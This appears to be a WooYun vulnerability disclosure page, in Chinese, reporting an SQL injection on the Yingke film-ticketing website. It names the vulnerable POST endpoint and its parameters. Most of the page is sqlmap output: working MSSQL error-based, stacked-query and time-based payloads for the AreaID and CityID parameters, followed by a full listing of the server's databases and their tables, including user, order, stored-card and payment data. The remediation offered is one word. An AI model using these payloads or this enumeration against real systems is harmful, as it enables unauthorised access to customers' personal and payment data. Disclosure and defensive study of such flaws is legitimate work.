当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146200

漏洞标题:影客票务主站SQL注入漏洞大量信息泄露

相关厂商:影客(北京)影视文化传媒有限公司

漏洞作者: 路人甲

提交时间:2015-10-13 11:30

修复时间:2015-11-27 11:32

公开时间:2015-11-27 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

包含用户信息、票务信息、订单信息...还有很多没有细看

详细说明:

http://www.yingke.tv/handle/Movies.ashx (POST)
AreaID=-1&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=

漏洞证明:

sqlmap identified the following injection point(s) with a total of 432 HTTP(s) requests:
---
Parameter: AreaID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
Parameter: CityID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AreaID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
Parameter: CityID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] EasyPay
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] WeiXinDataBase
[*] YingKeData
[*] YingKeDataTest
[*] YKStoredCard
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AreaID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
Parameter: CityID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: ReportServerTempDB
[9 tables]
+-----------------------------------------------------+
| ChunkData                                           |
| ChunkSegmentMapping                                 |
| ExecutionCache                                      |
| PersistedStream                                     |
| Segment                                             |
| SegmentedChunk                                      |
| SessionData                                         |
| SessionLock                                         |
| SnapshotData                                        |
+-----------------------------------------------------+
Database: tempdb
[18 tables]
+-----------------------------------------------------+
| #1590259A                                           |
| #23DE44F1                                           |
| #24D2692A                                           |
| #27AED5D5                                           |
| #28A2FA0E                                           |
| #29971E47                                           |
| #2D67AF2B                                           |
| #2E5BD364                                           |
| #2F4FF79D                                           |
| #30441BD6                                           |
| #75235608                                           |
| #76177A41                                           |
| #770B9E7A                                           |
| #77FFC2B3                                           |
| #78F3E6EC                                           |
| #79E80B25                                           |
| #7ADC2F5E                                           |
| #7BD05397                                           |
+-----------------------------------------------------+
Database: EasyPay
[86 tables]
+-----------------------------------------------------+
| tAgent                                              |
| tBankAccountType                                    |
| tBankBalance                                        |
| tBillType                                           |
| tBookingRecord                                      |
| tCaiXinRecords                                      |
| tCaiXinUser                                         |
| tCard                                               |
| tCardBin                                            |
| tCardInStorage                                      |
| tCardMap                                            |
| tCardPhysicsType                                    |
| tChargeRecord                                       |
| tCodeTable                                          |
| tCommisionRate                                      |
| tContact                                            |
| tDailyActionStatistics                              |
| tDailyAgentStatistics                               |
| tDailyBalance                                       |
| tDailyDingDanStatistics                             |
| tDailyIssueAndMerchantStatistics                    |
| tDailyMerchantPhysicsStatistics                     |
| tDailyMerchantStatistics                            |
| tDailyMerchantTerminalStatistics                    |
| tDailyPhysicsStatistics                             |
| tDailyPriceTable                                    |
| tDailyStatistics                                    |
| tDeposit                                            |
| tDiscountType                                       |
| tEnterprise                                         |
| tEnterpriseStatistics                               |
| tField                                              |
| tFieldBookRecord                                    |
| tFieldDiscountRule                                  |
| tFieldGroup                                         |
| tFieldScoreRule                                     |
| tFieldType                                          |
| tFinalHisTradeRecords                               |
| tFunction                                           |
| tFunctionType                                       |
| tGoods                                              |
| tGoodsDiscountRule                                  |
| tGoodsSaleRecord                                    |
| tGoodsScoreRule                                     |
| tGoodsType                                          |
| tHisCard                                            |
| tHisLog                                             |
| tHisSaleCardRecord                                  |
| tHisTradeRecords                                    |
| tIssueMoney                                         |
| tItemClass                                          |
| tLog                                                |
| tLogLevel                                           |
| tLogType                                            |
| tMakeCardApplication                                |
| tMember                                             |
| tMemberAuthority                                    |
| tMemberLevel                                        |
| tOffJobCalc                                         |
| tOldCard                                            |
| tOperator                                           |
| tOrgan                                              |
| tOrganCardBin                                       |
| tOrganType                                          |
| tPosAuthority                                       |
| tPosConsumptionRecord                               |
| tPosSerial                                          |
| tPriceTable                                         |
| tPurchaseGoodsRecord                                |
| tPurview                                            |
| tRechargeScoreRule                                  |
| tRole                                               |
| tSaleCardRecord                                     |
| tScoreType                                          |
| tStadium                                            |
| tStatusCode                                         |
| tTakeCardAuth                                       |
| tTerminal                                           |
| tTicket                                             |
| tTicketAction                                       |
| tTicketDingDan                                      |
| tTicketProject                                      |
| tTicketTradeRecords                                 |
| tTongJi                                             |
| tTradeRecords                                       |
| ttestcard                                           |
+-----------------------------------------------------+
Database: ReportServer
[31 tables]
+-----------------------------------------------------+
| ActiveSubscriptions                                 |
| Batch                                               |
| CachePolicy                                         |
| Catalog                                             |
| ChunkData                                           |
| ChunkSegmentMapping                                 |
| ConfigurationInfo                                   |
| DataSource                                          |
| Event                                               |
| ExecutionLogStorage                                 |
| History                                             |
| Keys                                                |
| ModelDrill                                          |
| ModelItemPolicy                                     |
| ModelPerspective                                    |
| Notifications                                       |
| Policies                                            |
| PolicyUserRole                                      |
| ReportSchedule                                      |
| Roles                                               |
| RunningJobs                                         |
| Schedule                                            |
| SecData                                             |
| Segment                                             |
| SegmentedChunk                                      |
| ServerParametersInstance                            |
| SnapshotData                                        |
| Subscriptions                                       |
| SubscriptionsBeingDeleted                           |
| UpgradeInfo                                         |
| Users                                               |
+-----------------------------------------------------+
Database: YingKeData
[68 tables]
+-----------------------------------------------------+
| JD_Order                                            |
| JD_OrderTicket                                      |
| LSB                                                 |
| M_Advertisement                                     |
| M_BindCard                                          |
| M_BlackIP                                           |
| M_CancelTicket                                      |
| M_CardAddvalue                                      |
| M_CardMerge                                         |
| M_City                                              |
| M_CityArea                                          |
| M_DisTicket                                         |
| M_FocusImg                                          |
| M_Help                                              |
| M_Links                                             |
| M_Message                                           |
| M_Movies                                            |
| M_NewOrder                                          |
| M_News                                              |
| M_Order                                             |
| M_OrderCardInfo                                     |
| M_Place                                             |
| M_Prize                                             |
| M_PrizeOrder                                        |
| M_PrizeShop                                         |
| M_Product                                           |
| M_ProductType                                       |
| M_ProductTypePlace                                  |
| M_ServiceQQ                                         |
| M_Trade                                             |
| M_TradeAddvalue                                     |
| M_TradeArea                                         |
| M_TradeCompany                                      |
| M_TradeCompanyCardOrder                             |
| M_TradeCompanyTicketCode                            |
| M_TradeCompanyTicketOrder                           |
| M_TradeTicket                                       |
| M_Trade_bak                                         |
| M_User                                              |
| M_UserAddress                                       |
| M_UserOrderAddress                                  |
| M_WhiteIP                                           |
| SM_Dept                                             |
| SM_Log                                              |
| SM_MenuTree                                         |
| SM_Role                                             |
| SM_RoleMenu                                         |
| SM_Sequences                                        |
| SM_User                                             |
| SM_UserRole                                         |
| SM_VisitUser                                        |
| S_Category                                          |
| S_CategorySub                                       |
| S_GroupBuy                                          |
| S_GroupBuyOrder                                     |
| S_ShopOrder                                         |
| S_ShopProduct                                       |
| V_GroupBuyOrder                                     |
| V_PrizeOrder                                        |
| V_ProductPlace                                      |
| V_ProductTypePlace                                  |
| V_ShopOrder                                         |
| V_TicketPlace                                       |
| V_TradeAddvalue                                     |
| V_TradeCompanyCardOrder                             |
| V_TradeCompanyTicketInfo                            |
| V_TradeCompanyTicketOrder                           |
| V_TradeTicket                                       |
+-----------------------------------------------------+
Database: msdb
[102 tables]
+-----------------------------------------------------+
| MSdbms                                              |
| MSdbms_datatype                                     |
| MSdbms_datatype_mapping                             |
| MSdbms_map                                          |
| backupfile                                          |
| backupfilegroup                                     |
| backupmediafamily                                   |
| backupmediaset                                      |
| backupset                                           |
| log_shipping_monitor_alert                          |
| log_shipping_monitor_error_detail                   |
| log_shipping_monitor_history_detail                 |
| log_shipping_monitor_primary                        |
| log_shipping_monitor_secondary                      |
| log_shipping_primaries                              |
| log_shipping_primary_databases                      |
| log_shipping_primary_secondaries                    |
| log_shipping_secondaries                            |
| log_shipping_secondary                              |
| log_shipping_secondary_databases                    |
| logmarkhistory                                      |
| restorefile                                         |
| restorefilegroup                                    |
| restorehistory                                      |
| sqlagent_info                                       |
| suspect_pages                                       |
| sysalerts                                           |
| syscachedcredentials                                |
| syscategories                                       |
| syscollector_blobs_internal                         |
| syscollector_collection_items_internal              |
| syscollector_collection_sets_internal               |
| syscollector_collector_types_internal               |
| syscollector_config_store_internal                  |
| syscollector_execution_log_internal                 |
| syscollector_execution_stats_internal               |
| syscollector_tsql_query_collector                   |
| sysdbmaintplan_databases                            |
| sysdbmaintplan_history                              |
| sysdbmaintplan_jobs                                 |
| sysdbmaintplans                                     |
| sysdownloadlist                                     |
| sysdtscategories                                    |
| sysdtspackagelog                                    |
| sysdtspackages                                      |
| sysdtssteplog                                       |
| sysdtstasklog                                       |
| sysjobactivity                                      |
| sysjobhistory                                       |
| sysjobs                                             |
| sysjobschedules                                     |
| sysjobservers                                       |
| sysjobsteps                                         |
| sysjobstepslogs                                     |
| sysmail_account                                     |
| sysmail_attachments                                 |
| sysmail_attachments_transfer                        |
| sysmail_configuration                               |
| sysmail_log                                         |
| sysmail_mailitems                                   |
| sysmail_principalprofile                            |
| sysmail_profile                                     |
| sysmail_profileaccount                              |
| sysmail_query_transfer                              |
| sysmail_send_retries                                |
| sysmail_server                                      |
| sysmail_servertype                                  |
| sysmaintplan_log                                    |
| sysmaintplan_logdetail                              |
| sysmaintplan_subplans                               |
| sysmanagement_shared_registered_servers_internal    |
| sysmanagement_shared_server_groups_internal         |
| sysnotifications                                    |
| sysoperators                                        |
| sysoriginatingservers                               |
| syspolicy_conditions_internal                       |
| syspolicy_configuration_internal                    |
| syspolicy_execution_internal                        |
| syspolicy_facet_events                              |
| syspolicy_management_facets                         |
| syspolicy_object_sets_internal                      |
| syspolicy_policies_internal                         |
| syspolicy_policy_categories_internal                |
| syspolicy_policy_category_subscriptions_internal    |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal         |
| syspolicy_system_health_state_internal              |
| syspolicy_target_set_levels_internal                |
| syspolicy_target_sets_internal                      |
| sysproxies                                          |
| sysproxylogin                                       |
| sysproxysubsystem                                   |
| sysschedules                                        |
| syssessions                                         |
| sysssislog                                          |
| sysssispackagefolders                               |
| sysssispackages                                     |
| syssubsystems                                       |
| systargetservergroupmembers                         |
| systargetservergroups                               |
| systargetservers                                    |
| systaskids                                          |
+-----------------------------------------------------+
Database: YKStoredCard
[87 tables]
+-----------------------------------------------------+
| tAgent                                              |
| tBankAccountType                                    |
| tBankBalance                                        |
| tBillType                                           |
| tBookingRecord                                      |
| tCaiXinRecords                                      |
| tCaiXinUser                                         |
| tCard                                               |
| tCardBin                                            |
| tCardInStorage                                      |
| tCardMap                                            |
| tCardPhysicsType                                    |
| tCardStatus                                         |
| tChangeCard                                         |
| tChargeRecord                                       |
| tCodeTable                                          |
| tCommisionRate                                      |
| tContact                                            |
| tDailyActionStatistics                              |
| tDailyAgentStatistics                               |
| tDailyBalance                                       |
| tDailyDingDanStatistics                             |
| tDailyIssueAndMerchantStatistics                    |
| tDailyMerchantPhysicsStatistics                     |
| tDailyMerchantStatistics                            |
| tDailyMerchantTerminalStatistics                    |
| tDailyPhysicsStatistics                             |
| tDailyPriceTable                                    |
| tDailyStatistics                                    |
| tDeposit                                            |
| tDiscountType                                       |
| tEnterprise                                         |
| tEnterpriseStatistics                               |
| tField                                              |
| tFieldBookRecord                                    |
| tFieldDiscountRule                                  |
| tFieldGroup                                         |
| tFieldScoreRule                                     |
| tFieldType                                          |
| tFinalHisTradeRecords                               |
| tFunction                                           |
| tFunctionType                                       |
| tGoods                                              |
| tGoodsDiscountRule                                  |
| tGoodsSaleRecord                                    |
| tGoodsScoreRule                                     |
| tGoodsType                                          |
| tHisCard                                            |
| tHisLog                                             |
| tHisSaleCardRecord                                  |
| tHisTradeRecords                                    |
| tIssueMoney                                         |
| tLog                                                |
| tLogLevel                                           |
| tLogType                                            |
| tMakeCardApplication                                |
| tMember                                             |
| tMemberAuthority                                    |
| tMemberLevel                                        |
| tOffJobCalc                                         |
| tOldCard                                            |
| tOperator                                           |
| tOrgan                                              |
| tOrganCardBin                                       |
| tOrganType                                          |
| tPosAuthority                                       |
| tPosConsumptionRecord                               |
| tPosSerial                                          |
| tPriceTable                                         |
| tPurchaseGoodsRecord                                |
| tPurview                                            |
| tRechargeScoreRule                                  |
| tRole                                               |
| tSaleCardRecord                                     |
| tScoreType                                          |
| tStadium                                            |
| tStatusCode                                         |
| tTakeCardAuth                                       |
| tTerminal                                           |
| tTicket                                             |
| tTicketAction                                       |
| tTicketDingDan                                      |
| tTicketProject                                      |
| tTicketTradeRecords                                 |
| tTongJi                                             |
| tTradeRecords                                       |
| ttestcard                                           |
+-----------------------------------------------------+
Database: WeiXinDataBase
[28 tables]
+-----------------------------------------------------+
| tAgent                                              |
| tAgentFunc                                          |
| tAgentFuncRelation                                  |
| tAgentLog                                           |
| tAgentOrder                                         |
| tAgentOrderTicket                                   |
| tAgentProduct                                       |
| tCardPool                                           |
| tCardTemp                                           |
| tChat                                               |
| tCinema                                             |
| tCinemaProduct                                      |
| tCinemaType                                         |
| tCity                                               |
| tCityArea                                           |
| tCustomMsg                                          |
| tFunction                                           |
| tJianYi                                             |
| tLog                                                |
| tMenu                                               |
| tMsg                                                |
| tOrderIDCreate                                      |
| tProduct                                            |
| tProductCount                                       |
| tSeesion                                            |
| tUser                                               |
| tUserOrder                                          |
| tUserOrderTicket                                    |
+-----------------------------------------------------+
Database: master
[6 tables]
+-----------------------------------------------------+
| MSreplication_options                               |
| spt_fallback_db                                     |
| spt_fallback_dev                                    |
| spt_fallback_usg                                    |
| spt_monitor                                         |
| spt_values                                          |
+-----------------------------------------------------+
Database: Test
[16 tables]
+-----------------------------------------------------+
| OnlineSeatOrder                                     |
| PayInfo                                             |
| SendTicketMsg                                       |
| tRelateCinema                                       |
| tRelateFilm                                         |
| tThirdCinema                                        |
| tThirdCinemaNotify                                  |
| tThirdCity                                          |
| tThirdFilm                                          |
| tThirdFilmNotify                                    |
| tThirdHall                                          |
| tThirdMerchant                                      |
| tThirdPriceRule                                     |
| tThirdRegion                                        |
| tThirdSeat                                          |
| tThirdShow                                          |
+-----------------------------------------------------+
Database: YingKeDataTest
[51 tables]
+-----------------------------------------------------+
| JD_Order                                            |
| JD_OrderTicket                                      |
| M_Advertisement                                     |
| M_BindCard                                          |
| M_CancelTicket                                      |
| M_CardAddvalue                                      |
| M_City                                              |
| M_CityArea                                          |
| M_DisTicket                                         |
| M_FocusImg                                          |
| M_Help                                              |
| M_Links                                             |
| M_Message                                           |
| M_Movies                                            |
| M_NewOrder                                          |
| M_News                                              |
| M_Order                                             |
| M_OrderCardInfo                                     |
| M_Place                                             |
| M_Prize                                             |
| M_PrizeOrder                                        |
| M_PrizeShop                                         |
| M_Product                                           |
| M_ProductType                                       |
| M_ProductTypePlace                                  |
| M_Trade                                             |
| M_TradeAddvalue                                     |
| M_TradeArea                                         |
| M_TradeCompany                                      |
| M_TradeCompanyCardOrder                             |
| M_TradeCompanyTicketCode                            |
| M_TradeCompanyTicketOrder                           |
| M_TradeTicket                                       |
| M_User                                              |
| M_UserAddress                                       |
| M_UserOrderAddress                                  |
| SM_Dept                                             |
| SM_Log                                              |
| SM_MenuTree                                         |
| SM_Role                                             |
| SM_RoleMenu                                         |
| SM_Sequences                                        |
| SM_User                                             |
| SM_UserRole                                         |
| SM_VisitUser                                        |
| S_Category                                          |
| S_CategorySub                                       |
| S_GroupBuy                                          |
| S_GroupBuyOrder                                     |
| S_ShopOrder                                         |
| S_ShopProduct                                       |
+-----------------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝